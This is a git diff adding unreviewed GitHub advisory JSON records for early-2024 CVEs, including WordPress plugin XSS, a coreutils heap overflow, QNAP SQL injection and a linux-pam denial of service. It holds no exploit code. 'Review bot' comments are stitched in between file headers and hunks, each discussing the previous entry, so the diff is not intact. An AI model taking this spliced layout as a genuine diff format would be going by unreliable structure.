+ "details": "The The Events Calendar plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.2.8.2 via the route function hooked into wp_ajax_nopriv_tribe_dropdown. This makes it possible for unauthenticated attackers to extract potentially sensitive data including post titles and IDs of pending, private and draft posts.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6557"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3010104%40the-events-calendar%2Ftags%2F6.2.9&old=3010096%40the-events-calendar%2Ftags%2F6.2.9"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/fc40196e-c0f3-4bc6-ac4b-b866902def61?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:15:55Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-p8pq-6r4w-c75v/GHSA-p8pq-6r4w-c75v.json b/advisories/unreviewed/2024/02/GHSA-p8pq-6r4w-c75v/GHSA-p8pq-6r4w-c75v.json
new file mode 100644
index 0000000000000..8fc428637de4c
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-p8pq-6r4w-c75v/GHSA-p8pq-6r4w-c75v.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p8pq-6r4w-c75v",
+ "modified": "2024-02-06T09:31:38Z",
+ "published": "2024-02-06T09:31:38Z",
+ "aliases": [
+ "CVE-2024-0684"
+ ],
+ "details": "A flaw was found in the GNU coreutils \"split\" program. A heap overflow with user-controlled data of multiple hundred bytes in length could occur in the line_bytes_split() function, potentially leading to an application crash and denial of service.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0684"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/security/cve/CVE-2024-0684"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258948"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.openwall.com/lists/oss-security/2024/01/18/2"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-122"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T09:15:52Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-p8wr-r5ww-35j3/GHSA-p8wr-r5ww-35j3.json b/advisories/unreviewed/2024/02/GHSA-p8wr-r5ww-35j3/GHSA-p8wr-r5ww-35j3.json
new file mode 100644
index 0000000000000..f3c6276233f3a
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-p8wr-r5ww-35j3/GHSA-p8wr-r5ww-35j3.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p8wr-r5ww-35j3",
+ "modified": "2024-02-05T06:30:30Z",
+ "published": "2024-02-05T06:30:30Z",
+ "aliases": [
+ "CVE-2023-5800"
+ ],
+ "details": "Vintage,\nmember of the AXIS OS Bug Bounty Program, has found that the VAPIX API create_overlay.cgi\ndid not have a sufficient input validation allowing for a possible remote code\nexecution. This flaw can only be exploited after authenticating with an\noperator- or administrator-privileged service account. Axis has released patched AXIS OS\nversions for the highlighted flaw. Please refer to the Axis security advisory\nfor more information and solution.\n\n\n\n\n\n\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5800"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.axis.com/dam/public/89/d9/99/cve-2023-5800-en-US-424339.pdf"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T06:15:46Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-p943-xf69-x33h/GHSA-p943-xf69-x33h.json b/advisories/unreviewed/2024/02/GHSA-p943-xf69-x33h/GHSA-p943-xf69-x33h.json
new file mode 100644
index 0000000000000..507e075de4af1
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-p943-xf69-x33h/GHSA-p943-xf69-x33h.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p943-xf69-x33h",
+ "modified": "2024-02-08T18:30:39Z",
+ "published": "2024-02-08T18:30:39Z",
+ "aliases": [
+ "CVE-2023-50061"
+ ],
+ "details": "PrestaShop Op'art Easy Redirect >= 1.3.8 and <= 1.3.12 is vulnerable to SQL Injection via Oparteasyredirect::hookActionDispatcher().",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50061"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.friendsofpresta.org/modules/2024/02/08/oparteasyredirect.html"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.store-opart.fr/p/39-module-redirection-prestashop.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T18:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-p947-jxh9-g736/GHSA-p947-jxh9-g736.json b/advisories/unreviewed/2024/02/GHSA-p947-jxh9-g736/GHSA-p947-jxh9-g736.json
new file mode 100644
index 0000000000000..a15db66f34744
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-p947-jxh9-g736/GHSA-p947-jxh9-g736.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p947-jxh9-g736",
+ "modified": "2024-02-08T21:30:34Z",
+ "published": "2024-02-01T09:30:18Z",
+ "aliases": [
+ "CVE-2023-37621"
+ ],
+ "details": "An issue in Fronius Datalogger Web v.2.0.5-4, allows remote attackers to obtain sensitive information via a crafted request.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37621"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/MY0723/CNVD-2022-27366__CVE-2023-37621"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-668"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T09:15:56Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-p9xw-3r92-842f/GHSA-p9xw-3r92-842f.json b/advisories/unreviewed/2024/02/GHSA-p9xw-3r92-842f/GHSA-p9xw-3r92-842f.json
new file mode 100644
index 0000000000000..413a650b362f6
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-p9xw-3r92-842f/GHSA-p9xw-3r92-842f.json
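Review bot: The vector `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` and the `CRITICAL` severity do not line up with `details`, which describe only obtaining sensitive information via a crafted request; a pure disclosure issue would normally score I:N/A:N and land well below critical. Both values are carried over from NVD, so the file is a faithful import, but the mismatch is worth a manual look before this entry is promoted out of `unreviewed`. The only non-NVD reference is a third-party GitHub repository rather than a vendor advisory, so there is no fix or patched-version information here for consumers to act on; a comment in the review record such as "severity disputed against description, no vendor fix reference" would help the triager.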
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p9xw-3r92-842f",
+ "modified": "2024-02-08T03:32:45Z",
+ "published": "2024-02-08T03:32:45Z",
+ "aliases": [
+ "CVE-2024-24350"
+ ],
+ "details": "File Upload vulnerability in Software Publico e-Sic Livre v.2.0 and before allows a remote attacker to execute arbitrary code via the extension filtering component.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24350"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gist.github.com/viniciuspinheiros/4e53b297fd6466cf12d01867ee1c9c33"
+ },
+ {
+ "type": "WEB",
+ "url": "https://medium.com/%40viniciuspinheiros/e-sic-livre-2-0-authenticated-file-upload-leads-to-remote-code-execution-rce-5937c9537258"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T01:15:27Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-pc53-x582-24xc/GHSA-pc53-x582-24xc.json b/advisories/unreviewed/2024/02/GHSA-pc53-x582-24xc/GHSA-pc53-x582-24xc.json
new file mode 100644
index 0000000000000..43c0d3e984ef5
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-pc53-x582-24xc/GHSA-pc53-x582-24xc.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pc53-x582-24xc",
+ "modified": "2024-02-06T03:33:00Z",
+ "published": "2024-02-06T03:33:00Z",
+ "aliases": [
+ "CVE-2024-20820"
+ ],
+ "details": "Improper input validation in bootloader prior to SMR Feb-2024 Release 1 allows attacker to cause an Out-Of-Bounds read.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20820"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T03:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-pcmw-6hxc-hqmx/GHSA-pcmw-6hxc-hqmx.json b/advisories/unreviewed/2024/02/GHSA-pcmw-6hxc-hqmx/GHSA-pcmw-6hxc-hqmx.json
new file mode 100644
index 0000000000000..69f177ed10670
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-pcmw-6hxc-hqmx/GHSA-pcmw-6hxc-hqmx.json
@@ -0,0 +1,47 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pcmw-6hxc-hqmx",
+ "modified": "2024-02-06T09:31:38Z",
+ "published": "2024-02-06T09:31:38Z",
+ "aliases": [
+ "CVE-2024-22365"
+ ],
+ "details": "linux-pam (aka Linux PAM) before 1.6.0 allows attackers to cause a denial of service (blocked login process) via mkfifo because the openat call (for protect_dir) lacks O_DIRECTORY.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22365"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/linux-pam/linux-pam/commit/031bb5a5d0d950253b68138b498dc93be69a64cb"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/linux-pam/linux-pam"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/linux-pam/linux-pam/releases/tag/v1.6.0"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2024/01/18/3"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T08:15:52Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-pf2p-5vvg-9vxj/GHSA-pf2p-5vvg-9vxj.json b/advisories/unreviewed/2024/02/GHSA-pf2p-5vvg-9vxj/GHSA-pf2p-5vvg-9vxj.json
new file mode 100644
index 0000000000000..4c93aeb7821d3
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-pf2p-5vvg-9vxj/GHSA-pf2p-5vvg-9vxj.json
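Review bot: All four non-NVD references are typed `WEB`, although the OSV reference vocabulary this schema follows has more specific types for two of them: the repository URL `https://github.com/linux-pam/linux-pam` fits `PACKAGE`, and the commit `031bb5a5d0d950253b68138b498dc93be69a64cb` fits `FIX`, i.e. `{ "type": "FIX", "url": "https://github.com/linux-pam/linux-pam/commit/031bb5a5d0d950253b68138b498dc93be69a64cb" }`. If the unreviewed importer deliberately emits `WEB` for everything, that is a pipeline-level choice and the typing should be revisited when the entry is reviewed rather than patched here. `affected` is empty even though `details` and the `v1.6.0` release-tag reference both fix the boundary at 1.6.0, presumably because linux-pam belongs to no ecosystem the database can express; consumers who need the fixed version have to extract it from the description. The `severity` array is empty with `database_specific.severity` null, which is at least internally consistent.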
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pf2p-5vvg-9vxj",
+ "modified": "2024-02-07T00:30:25Z",
+ "published": "2024-02-07T00:30:25Z",
+ "aliases": [
+ "CVE-2024-22519"
+ ],
+ "details": "An issue discovered in OpenDroneID OSM 3.5.1 allows attackers to impersonate other drones via transmission of crafted data packets.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22519"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/Drone-Lab/opendroneid-vulnerability"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T22:16:14Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-pf89-rhhw-xmhp/GHSA-pf89-rhhw-xmhp.json b/advisories/unreviewed/2024/02/GHSA-pf89-rhhw-xmhp/GHSA-pf89-rhhw-xmhp.json
new file mode 100644
index 0000000000000..cf47d12c3a23a
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-pf89-rhhw-xmhp/GHSA-pf89-rhhw-xmhp.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pf89-rhhw-xmhp",
+ "modified": "2024-02-07T00:30:26Z",
+ "published": "2024-02-07T00:30:26Z",
+ "aliases": [
+ "CVE-2024-1284"
+ ],
+ "details": "Use after free in Mojo in Google Chrome prior to 121.0.6167.160 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1284"
+ },
+ {
+ "type": "WEB",
+ "url": "https://chromereleases.googleblog.com/2024/02/stable-channel-update-for-desktop.html"
+ },
+ {
+ "type": "WEB",
+ "url": "https://issues.chromium.org/issues/41494539"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T00:15:56Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-pg26-49x3-7h59/GHSA-pg26-49x3-7h59.json b/advisories/unreviewed/2024/02/GHSA-pg26-49x3-7h59/GHSA-pg26-49x3-7h59.json
new file mode 100644
index 0000000000000..88d13e8dbb26d
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-pg26-49x3-7h59/GHSA-pg26-49x3-7h59.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pg26-49x3-7h59",
+ "modified": "2024-02-06T06:30:31Z",
+ "published": "2024-02-06T06:30:31Z",
+ "aliases": [
+ "CVE-2023-43513"
+ ],
+ "details": "Memory corruption while processing the event ring, the context read pointer is untrusted to HLOS and when it is passed with arbitrary values, may point to address in the middle of ring element.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43513"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T06:16:01Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-pg7w-g93j-pc6j/GHSA-pg7w-g93j-pc6j.json b/advisories/unreviewed/2024/02/GHSA-pg7w-g93j-pc6j/GHSA-pg7w-g93j-pc6j.json
new file mode 100644
index 0000000000000..cd789d9e7d525
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-pg7w-g93j-pc6j/GHSA-pg7w-g93j-pc6j.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pg7w-g93j-pc6j",
+ "modified": "2024-02-02T18:30:31Z",
+ "published": "2024-02-02T18:30:31Z",
+ "aliases": [
+ "CVE-2023-39303"
+ ],
+ "details": "An improper authentication vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to compromise the security of the system via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.3.2578 build 20231110 and later\nQuTS hero h5.1.3.2578 build 20231110 and later\nQuTScloud c5.1.5.2651 and later\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39303"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qnap.com/en/security-advisory/qsa-23-33"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-287"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T16:15:47Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-pg8c-mxmr-vcqr/GHSA-pg8c-mxmr-vcqr.json b/advisories/unreviewed/2024/02/GHSA-pg8c-mxmr-vcqr/GHSA-pg8c-mxmr-vcqr.json
new file mode 100644
index 0000000000000..74364daf57c6e
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-pg8c-mxmr-vcqr/GHSA-pg8c-mxmr-vcqr.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pg8c-mxmr-vcqr",
+ "modified": "2024-02-06T03:33:00Z",
+ "published": "2024-02-06T03:33:00Z",
+ "aliases": [
+ "CVE-2024-20828"
+ ],
+ "details": "Improper authorization verification vulnerability in Samsung Internet prior to version 24.0 allows physical attackers to access files downloaded in SecretMode without proper authentication.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20828"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T03:15:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-pgjx-2qxc-c47q/GHSA-pgjx-2qxc-c47q.json b/advisories/unreviewed/2024/02/GHSA-pgjx-2qxc-c47q/GHSA-pgjx-2qxc-c47q.json
new file mode 100644
index 0000000000000..409e838a0c0f5
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-pgjx-2qxc-c47q/GHSA-pgjx-2qxc-c47q.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pgjx-2qxc-c47q",
+ "modified": "2024-02-06T00:30:27Z",
+ "published": "2024-02-06T00:30:27Z",
+ "aliases": [
+ "CVE-2024-0597"
+ ],
+ "details": "The SEO Plugin by Squirrly SEO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to and including 12.3.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0597"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3023398/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a61a8d8b-f22f-4a16-95f6-6cf52cf545ad?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:16:02Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-pgq6-4q3w-7pvf/GHSA-pgq6-4q3w-7pvf.json b/advisories/unreviewed/2024/02/GHSA-pgq6-4q3w-7pvf/GHSA-pgq6-4q3w-7pvf.json
new file mode 100644
index 0000000000000..e45f697592d1d
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-pgq6-4q3w-7pvf/GHSA-pgq6-4q3w-7pvf.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pgq6-4q3w-7pvf",
+ "modified": "2024-02-07T18:30:26Z",
+ "published": "2024-02-02T00:31:25Z",
+ "aliases": [
+ "CVE-2023-47256"
+ ],
+ "details": "ConnectWise ScreenConnect through 23.8.4 allows local users to connect to arbitrary relay servers via implicit trust of proxy settings",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47256"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.8-security-fix"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-287"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T22:15:55Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-ph96-9c75-4297/GHSA-ph96-9c75-4297.json b/advisories/unreviewed/2024/02/GHSA-ph96-9c75-4297/GHSA-ph96-9c75-4297.json
new file mode 100644
index 0000000000000..d6898a5658a01
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-ph96-9c75-4297/GHSA-ph96-9c75-4297.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-ph96-9c75-4297",
+ "modified": "2024-02-02T12:30:30Z",
+ "published": "2024-02-02T12:30:30Z",
+ "aliases": [
+ "CVE-2024-0963"
+ ],
+ "details": "The Calculated Fields Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's CP_CALCULATED_FIELDS shortcode in all versions up to, and including, 1.2.52 due to insufficient input sanitization and output escaping on user supplied 'location' attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0963"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3029782/calculated-fields-form/trunk/inc/cpcff_main.inc.php"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3029782%40calculated-fields-form&new=3029782%40calculated-fields-form&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d870ff8d-ea4b-4777-9892-0d9982182b9f?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T12:15:49Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-phfj-2mq7-qmg7/GHSA-phfj-2mq7-qmg7.json b/advisories/unreviewed/2024/02/GHSA-phfj-2mq7-qmg7/GHSA-phfj-2mq7-qmg7.json
new file mode 100644
index 0000000000000..57d764c468aca
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-phfj-2mq7-qmg7/GHSA-phfj-2mq7-qmg7.json
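Review bot: The second `plugins.trac.wordpress.org/changeset?...` reference compares a revision with itself (`old=3029782%40calculated-fields-form&new=3029782%40calculated-fields-form`), so following it is unlikely to show the fix; the first changeset reference, `changeset/3029782/calculated-fields-form/trunk/inc/cpcff_main.inc.php`, already points at the patched file and is the one a consumer needs. The same self-comparing query appears in GHSA-phfx-2gmw-mfx5 (`old=3032152…&new=3032152…`), where the linked commit reference carries the actual change. These URLs are carried over from NVD; if the importer can drop a changeset URL whose `old` and `new` revisions are equal, the reference list stays actionable. The duplicated `sfp_email=&sfph_mail=` query parameters in the same URL are cosmetic.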
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-phfj-2mq7-qmg7",
+ "modified": "2024-02-02T18:30:32Z",
+ "published": "2024-02-02T18:30:32Z",
+ "aliases": [
+ "CVE-2023-47568"
+ ],
+ "details": "A SQL injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated users to inject malicious code via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.5.2645 build 20240116 and later\nQTS 4.5.4.2627 build 20231225 and later\nQuTS hero h5.1.5.2647 build 20240118 and later\nQuTS hero h4.5.4.2626 build 20231225 and later\nQuTScloud c5.1.5.2651 and later\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47568"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qnap.com/en/security-advisory/qsa-24-05"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-89"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T16:15:52Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-phfq-h2c2-v87m/GHSA-phfq-h2c2-v87m.json b/advisories/unreviewed/2024/02/GHSA-phfq-h2c2-v87m/GHSA-phfq-h2c2-v87m.json
new file mode 100644
index 0000000000000..8138b9911c0ae
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-phfq-h2c2-v87m/GHSA-phfq-h2c2-v87m.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-phfq-h2c2-v87m",
+ "modified": "2024-02-08T06:30:24Z",
+ "published": "2024-02-08T06:30:24Z",
+ "aliases": [
+ "CVE-2024-0511"
+ ],
